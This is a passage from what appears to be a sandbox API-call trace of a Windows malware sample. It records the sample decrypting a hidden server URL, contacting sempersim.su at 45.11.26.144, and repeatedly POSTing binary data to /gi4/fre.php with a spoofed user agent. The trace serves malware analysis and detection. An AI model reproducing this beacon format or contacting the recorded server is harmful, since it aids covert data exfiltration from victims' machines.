FreeAddrInfoW (pAddrInfo=0x5cdd18*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x5cf2a8*(sa_family=2, sin_port=0x50, sin_addr="45.11.26.144"), ai_next=0x0)) [0258.120] GetProcessHeap () returned 0x5b0000 [0258.120] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x7d) returned 0x5c5cc8 [0258.120] GetProcessHeap () returned 0x5b0000 [0258.120] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x201b) returned 0x5d6e28 [0258.121] LoadLibraryW (lpLibFileName="user32") returned 0x743d0000 [0258.122] wvsprintfA (in: param_1=0x5d6e28, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0xdfce0 | out: param_1="POST /gi4/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: sempersim.su\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 171 [0258.122] GetProcessHeap () returned 0x5b0000 [0258.122] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0xad) returned 0x5c6200 [0258.122] GetProcessHeap () returned 0x5b0000 [0258.123] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5d6e28 | out: hHeap=0x5b0000) returned 1 [0258.123] GetProcessHeap () returned 0x5b0000 [0258.123] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x3e) returned 0x5d31e8 [0258.123] GetProcessHeap () returned 0x5b0000 [0258.123] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x1fdc) returned 0x5d6e28 [0258.123] LoadLibraryW (lpLibFileName="user32") returned 0x743d0000 [0258.125] wvsprintfA (in: param_1=0x5d6e28, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0xdfce0 | out: param_1="POST /gi4/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: sempersim.su\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: AA29FF80\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 236 [0258.125] GetProcessHeap () returned 0x5b0000 [0258.125] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0xee) returned 0x5cc0b0 [0258.125] GetProcessHeap () returned 0x5b0000 [0258.125] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5d6e28 | out: hHeap=0x5b0000) returned 1 [0258.125] send (s=0x3a0, buf=0x5cc0b0*, len=236, flags=0) returned 236 [0258.126] send (s=0x3a0, buf=0x5d1e18*, len=159, flags=0) returned 159 [0258.126] GetProcessHeap () returned 0x5b0000 [0258.126] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0xfd0) returned 0x5d6e28 [0258.126] recv (in: s=0x3a0, buf=0x5d6e28, len=4048, flags=0 | out: buf=0x5d6e28*) returned 237 [0259.678] GetProcessHeap () returned 0x5b0000 [0259.679] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5cc0b0 | out: hHeap=0x5b0000) returned 1 [0259.679] GetProcessHeap () returned 0x5b0000 [0259.679] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5d31e8 | out: hHeap=0x5b0000) returned 1 [0259.679] GetProcessHeap () returned 0x5b0000 [0259.679] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5c6200 | out: hHeap=0x5b0000) returned 1 [0259.679] GetProcessHeap () returned 0x5b0000 [0259.679] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5c5cc8 | out: hHeap=0x5b0000) returned 1 [0259.680] closesocket (s=0x3a0) returned 0 [0259.680] GetProcessHeap () returned 0x5b0000 [0259.680] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5ca8b0 | out: hHeap=0x5b0000) returned 1 [0259.680] GetProcessHeap () returned 0x5b0000 [0259.680] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5d54c0 | out: hHeap=0x5b0000) returned 1 [0259.680] GetProcessHeap () returned 0x5b0000 [0259.681] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5d3428 | out: hHeap=0x5b0000) returned 1 [0259.681] GetProcessHeap () returned 0x5b0000 [0259.681] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5cb0d8 | out: hHeap=0x5b0000) returned 1 [0259.681] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x5d6e28, dwCreationFlags=0x0, lpThreadId=0xdff08 | out: lpThreadId=0xdff08*=0xc14) returned 0x3a0 [0259.683] Sleep (dwMilliseconds=0xea60) [0259.687] GetProcessHeap () returned 0x5b0000 [0259.687] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x40) returned 0x5d32c0 [0259.687] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0259.688] CryptAcquireContextW (in: phProv=0xdfca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0xdfca8*=0x0) returned 1 [0259.694] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0259.695] CryptAcquireContextW (in: phProv=0xdfca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0xdfca8*=0x5c5910) returned 1 [0259.709] GetProcessHeap () returned 0x5b0000 [0259.709] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x24) returned 0x5c8650 [0259.709] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0259.710] CryptImportKey (in: hProv=0x5c5910, pbData=0x5c8650, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0xdfcac | out: phKey=0xdfcac*=0x5bde08) returned 1 [0259.710] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0259.711] CryptSetKeyParam (hKey=0x5bde08, dwParam=0x4, pbData=0xdfca4*=0x1, dwFlags=0x0) returned 1 [0259.711] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0259.711] CryptSetKeyParam (hKey=0x5bde08, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0259.711] GetProcessHeap () returned 0x5b0000 [0259.712] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5c8650 | out: hHeap=0x5b0000) returned 1 [0259.712] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0259.712] CryptDecrypt (in: hKey=0x5bde08, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x5d32c0, pdwDataLen=0xdfcfc | out: pbData=0x5d32c0, pdwDataLen=0xdfcfc) returned 1 [0259.713] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0259.713] CryptDestroyKey (hKey=0x5bde08) returned 1 [0259.714] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0259.714] CryptReleaseContext (hProv=0x5c5910, dwFlags=0x0) returned 1 [0259.714] GetProcessHeap () returned 0x5b0000 [0259.714] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x212) returned 0x5d6a50 [0259.715] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0259.715] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x8c\x9a\x92\x8f\x9a\x8d\x8c\x96\x92Ñ\x8c\x8aÐ\x98\x96ËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0259.715] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0259.716] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x8c\x9a\x92\x8f\x9a\x8d\x8c\x96\x92Ñ\x8c\x8aÐ\x98\x96ËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0259.716] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0259.717] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x8c\x9a\x92\x8f\x9a\x8d\x8c\x96\x92Ñ\x8c\x8aÐ\x98\x96ËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0259.717] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0259.846] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x8c\x9a\x92\x8f\x9a\x8d\x8c\x96\x92Ñ\x8c\x8aÐ\x98\x96ËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0259.846] GetProcessHeap () returned 0x5b0000 [0259.846] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x20) returned 0x5cb0d8 [0259.846] getaddrinfo (in: pNodeName="\x97\x8b\x8b\x8fÅÐÐ\x8c\x9a\x92\x8f\x9a\x8d\x8c\x96\x92Ñ\x8c\x8aÐ\x98\x96ËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0xdfcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0xdfcd8 | out: ppResult=0xdfcd8*=0x0) returned 11001 [0259.847] GetProcessHeap () returned 0x5b0000 [0259.847] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5cb0d8 | out: hHeap=0x5b0000) returned 1 [0259.847] GetProcessHeap () returned 0x5b0000 [0259.847] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5d6a50 | out: hHeap=0x5b0000) returned 1 [0259.847] GetProcessHeap () returned 0x5b0000 [0259.848] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5d32c0 | out: hHeap=0x5b0000) returned 1 [0259.848] GetProcessHeap () returned 0x5b0000 [0259.848] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x40) returned 0x5d34b8 [0259.848] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0259.849] CryptAcquireContextW (in: phProv=0xdfca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0xdfca8*=0x0) returned 1 [0259.855] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0259.855] CryptAcquireContextW (in: phProv=0xdfca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0xdfca8*=0x5c5dd8) returned 1 [0259.864] GetProcessHeap () returned 0x5b0000 [0259.864] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x24) returned 0x5c8650 [0259.865] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0259.865] CryptImportKey (in: hProv=0x5c5dd8, pbData=0x5c8650, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0xdfcac | out: phKey=0xdfcac*=0x5bde08) returned 1 [0259.866] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0259.866] CryptSetKeyParam (hKey=0x5bde08, dwParam=0x4, pbData=0xdfca4*=0x1, dwFlags=0x0) returned 1 [0259.867] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0259.867] CryptSetKeyParam (hKey=0x5bde08, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0259.867] GetProcessHeap () returned 0x5b0000 [0259.868] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5c8650 | out: hHeap=0x5b0000) returned 1 [0259.868] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0259.869] CryptDecrypt (in: hKey=0x5bde08, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x5d34b8, pdwDataLen=0xdfcfc | out: pbData=0x5d34b8, pdwDataLen=0xdfcfc) returned 1 [0259.869] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0259.870] CryptDestroyKey (hKey=0x5bde08) returned 1 [0259.870] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0259.871] CryptReleaseContext (hProv=0x5c5dd8, dwFlags=0x0) returned 1 [0259.871] GetProcessHeap () returned 0x5b0000 [0259.871] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x212) returned 0x5d6a50 [0259.871] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0259.872] StrStrA (lpFirst="http://sempersim.su/gi4/fre.php", lpSrch="http://") returned="http://sempersim.su/gi4/fre.php" [0259.872] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0259.873] StrStrA (lpFirst="sempersim.su/gi4/fre.php", lpSrch="/") returned="/gi4/fre.php" [0259.873] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0259.874] StrStrA (lpFirst="sempersim.su/gi4/fre.php", lpSrch=":") returned 0x0 [0259.874] GetProcessHeap () returned 0x5b0000 [0259.875] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x20) returned 0x5cb0d8 [0259.875] getaddrinfo (in: pNodeName="sempersim.su", pServiceName="80", pHints=0xdfcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0xdfcd8 | out: ppResult=0xdfcd8*=0x5cdfc0*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x5cf380*(sa_family=2, sin_port=0x50, sin_addr="45.11.26.144"), ai_next=0x0)) returned 0 [0259.877] GetProcessHeap () returned 0x5b0000 [0259.877] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x4) returned 0x5ca9b0 [0259.877] socket (af=2, type=1, protocol=6) returned 0x3a4 [0259.877] connect (s=0x3a4, name=0x5cf380*(sa_family=2, sin_port=0x50, sin_addr="45.11.26.144"), namelen=16) returned 0 [0259.950] FreeAddrInfoW (pAddrInfo=0x5cdfc0*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x5cf380*(sa_family=2, sin_port=0x50, sin_addr="45.11.26.144"), ai_next=0x0)) [0259.950] GetProcessHeap () returned 0x5b0000 [0259.950] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x7d) returned 0x5c5cc8 [0259.950] GetProcessHeap () returned 0x5b0000 [0259.950] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x201b) returned 0x5d6e28 [0259.951] LoadLibraryW (lpLibFileName="user32") returned 0x743d0000 [0259.952] wvsprintfA (in: param_1=0x5d6e28, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0xdfce0 | out: param_1="POST /gi4/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: sempersim.su\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 171 [0259.952] GetProcessHeap () returned 0x5b0000 [0259.952] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0xad) returned 0x5c6200 [0259.952] GetProcessHeap () returned 0x5b0000 [0259.952] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5d6e28 | out: hHeap=0x5b0000) returned 1 [0259.955] GetProcessHeap () returned 0x5b0000 [0259.955] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x3e) returned 0x5d3158 [0259.955] GetProcessHeap () returned 0x5b0000 [0259.955] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x1fdc) returned 0x5d6e28 [0259.956] LoadLibraryW (lpLibFileName="user32") returned 0x743d0000 [0259.957] wvsprintfA (in: param_1=0x5d6e28, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0xdfce0 | out: param_1="POST /gi4/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: sempersim.su\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: AA29FF80\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 236 [0259.957] GetProcessHeap () returned 0x5b0000 [0259.957] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0xee) returned 0x5cc0b0 [0259.957] GetProcessHeap () returned 0x5b0000 [0259.958] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5d6e28 | out: hHeap=0x5b0000) returned 1 [0259.958] send (s=0x3a4, buf=0x5cc0b0*, len=236, flags=0) returned 236 [0259.958] send (s=0x3a4, buf=0x5d1e18*, len=159, flags=0) returned 159 [0259.958] GetProcessHeap () returned 0x5b0000 [0259.958] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0xfd0) returned 0x5d6e28 [0259.959] recv (in: s=0x3a4, buf=0x5d6e28, len=4048, flags=0 | out: buf=0x5d6e28*) returned 237 [0261.061] GetProcessHeap () returned 0x5b0000 [0261.061] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5cc0b0 | out: hHeap=0x5b0000) returned 1 [0261.063] GetProcessHeap () returned 0x5b0000 [0261.063] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5d3158 | out: hHeap=0x5b0000) returned 1 [0261.063] GetProcessHeap () returned 0x5b0000 [0261.064] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5c6200 | out: hHeap=0x5b0000) returned 1 [0261.064] GetProcessHeap () returned 0x5b0000 [0261.064] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5c5cc8 | out: hHeap=0x5b0000) returned 1 [0261.064] closesocket (s=0x3a4) returned 0 [0261.065] GetProcessHeap () returned 0x5b0000 [0261.065] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5ca9b0 | out: hHeap=0x5b0000) returned 1 [0261.065] GetProcessHeap () returned 0x5b0000 [0261.065] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5d6a50 | out: hHeap=0x5b0000) returned 1 [0261.065] GetProcessHeap () returned 0x5b0000 [0261.066] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5d34b8 | out: hHeap=0x5b0000) returned 1 [0261.066] GetProcessHeap () returned 0x5b0000 [0261.066] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5cb0d8 | out: hHeap=0x5b0000) returned 1 [0261.066] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x5d6e28, dwCreationFlags=0x0, lpThreadId=0xdff08 | out: lpThreadId=0xdff08*=0xc18) returned 0x3a4 [0261.069] Sleep (dwMilliseconds=0xea60) [0261.097] GetProcessHeap () returned 0x5b0000 [0261.097] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x40) returned 0x5d31e8 [0261.098] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0261.098] CryptAcquireContextW (in: phProv=0xdfca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0xdfca8*=0x0) returned 1 [0261.106] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0261.106] CryptAcquireContextW (in: phProv=0xdfca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0xdfca8*=0x5c5888) returned 1 [0261.117] GetProcessHeap () returned 0x5b0000 [0261.117] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x24) returned 0x5c8800 [0261.117] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0261.118] CryptImportKey (in: hProv=0x5c5888, pbData=0x5c8800, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0xdfcac | out: phKey=0xdfcac*=0x5be288) returned 1 [0261.118] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0261.119] CryptSetKeyParam (hKey=0x5be288, dwParam=0x4, pbData=0xdfca4*=0x1, dwFlags=0x0) returned 1 [0261.119] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0261.120] CryptSetKeyParam (hKey=0x5be288, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0261.120] GetProcessHeap () returned 0x5b0000 [0261.120] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5c8800 | out: hHeap=0x5b0000) returned 1 [0261.121] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0261.121] CryptDecrypt (in: hKey=0x5be288, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x5d31e8, pdwDataLen=0xdfcfc | out: pbData=0x5d31e8, pdwDataLen=0xdfcfc) returned 1 [0261.122] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0261.122] CryptDestroyKey (hKey=0x5be288) returned 1 [0261.123] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0261.123] CryptReleaseContext (hProv=0x5c5888, dwFlags=0x0) returned 1 [0261.123] GetProcessHeap () returned 0x5b0000 [0261.123] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x212) returned 0x5d63d8 [0261.127] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0261.127] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x8c\x9a\x92\x8f\x9a\x8d\x8c\x96\x92Ñ\x8c\x8aÐ\x98\x96ËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0261.128] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0261.128] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x8c\x9a\x92\x8f\x9a\x8d\x8c\x96\x92Ñ\x8c\x8aÐ\x98\x96ËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0261.129] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0261.129] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x8c\x9a\x92\x8f\x9a\x8d\x8c\x96\x92Ñ\x8c\x8aÐ\x98\x96ËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0261.130] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0261.130] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x8c\x9a\x92\x8f\x9a\x8d\x8c\x96\x92Ñ\x8c\x8aÐ\x98\x96ËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0261.130] GetProcessHeap () returned 0x5b0000 [0261.130] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x20) returned 0x5cb0d8 [0261.130] getaddrinfo (in: pNodeName="\x97\x8b\x8b\x8fÅÐÐ\x8c\x9a\x92\x8f\x9a\x8d\x8c\x96\x92Ñ\x8c\x8aÐ\x98\x96ËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0xdfcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0xdfcd8 | out: ppResult=0xdfcd8*=0x0) returned 11001 [0261.131] GetProcessHeap () returned 0x5b0000 [0261.131] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5cb0d8 | out: hHeap=0x5b0000) returned 1 [0261.131] GetProcessHeap () returned 0x5b0000 [0261.131] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5d63d8 | out: hHeap=0x5b0000) returned 1 [0261.131] GetProcessHeap () returned 0x5b0000 [0261.132] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5d31e8 | out: hHeap=0x5b0000) returned 1 [0261.132] GetProcessHeap () returned 0x5b0000 [0261.132] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x40) returned 0x5d3470 [0261.132] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0261.133] CryptAcquireContextW (in: phProv=0xdfca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0xdfca8*=0x0) returned 1 [0261.141] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0261.142] CryptAcquireContextW (in: phProv=0xdfca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0xdfca8*=0x5c5dd8) returned 1 [0261.148] GetProcessHeap () returned 0x5b0000 [0261.149] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x24) returned 0x5c8800 [0261.149] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0261.150] CryptImportKey (in: hProv=0x5c5dd8, pbData=0x5c8800, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0xdfcac | out: phKey=0xdfcac*=0x5bde08) returned 1 [0261.150] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0261.151] CryptSetKeyParam (hKey=0x5bde08, dwParam=0x4, pbData=0xdfca4*=0x1, dwFlags=0x0) returned 1 [0261.151] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0261.152] CryptSetKeyParam (hKey=0x5bde08, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0261.152] GetProcessHeap () returned 0x5b0000 [0261.152] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5c8800 | out: hHeap=0x5b0000) returned 1 [0261.153] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0261.153] CryptDecrypt (in: hKey=0x5bde08, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x5d3470, pdwDataLen=0xdfcfc | out: pbData=0x5d3470, pdwDataLen=0xdfcfc) returned 1 [0261.154] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0261.154] CryptDestroyKey (hKey=0x5bde08) returned 1 [0261.155] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0261.155] CryptReleaseContext (hProv=0x5c5dd8, dwFlags=0x0) returned 1 [0261.155] GetProcessHeap () returned 0x5b0000 [0261.155] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x212) returned 0x5d5910 [0261.156] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0261.156] StrStrA (lpFirst="http://sempersim.su/gi4/fre.php", lpSrch="http://") returned="http://sempersim.su/gi4/fre.php" [0261.159] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0261.160] StrStrA (lpFirst="sempersim.su/gi4/fre.php", lpSrch="/") returned="/gi4/fre.php" [0261.160] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0261.161] StrStrA (lpFirst="sempersim.su/gi4/fre.php", lpSrch=":") returned 0x0 [0261.161] GetProcessHeap () returned 0x5b0000 [0261.161] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x20) returned 0x5cb128 [0261.161] getaddrinfo (in: pNodeName="sempersim.su", pServiceName="80", pHints=0xdfcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0xdfcd8 | out: ppResult=0xdfcd8*=0x5ce088*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x5cf248*(sa_family=2, sin_port=0x50, sin_addr="45.11.26.144"), ai_next=0x0)) returned 0 [0261.162] GetProcessHeap () returned 0x5b0000 [0261.162] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x4) returned 0x5caa60 [0261.162] socket (af=2, type=1, protocol=6) returned 0x3a8 [0261.163] connect (s=0x3a8, name=0x5cf248*(sa_family=2, sin_port=0x50, sin_addr="45.11.26.144"), namelen=16) returned 0 [0261.230] FreeAddrInfoW (pAddrInfo=0x5ce088*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x5cf248*(sa_family=2, sin_port=0x50, sin_addr="45.11.26.144"), ai_next=0x0)) [0261.230] GetProcessHeap () returned 0x5b0000 [0261.230] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x7d) returned 0x5c5cc8 [0261.230] GetProcessHeap () returned 0x5b0000 [0261.231] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x201b) returned 0x5d6e28 [0261.232] LoadLibraryW (lpLibFileName="user32") returned 0x743d0000 [0261.233] wvsprintfA (in: param_1=0x5d6e28, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", 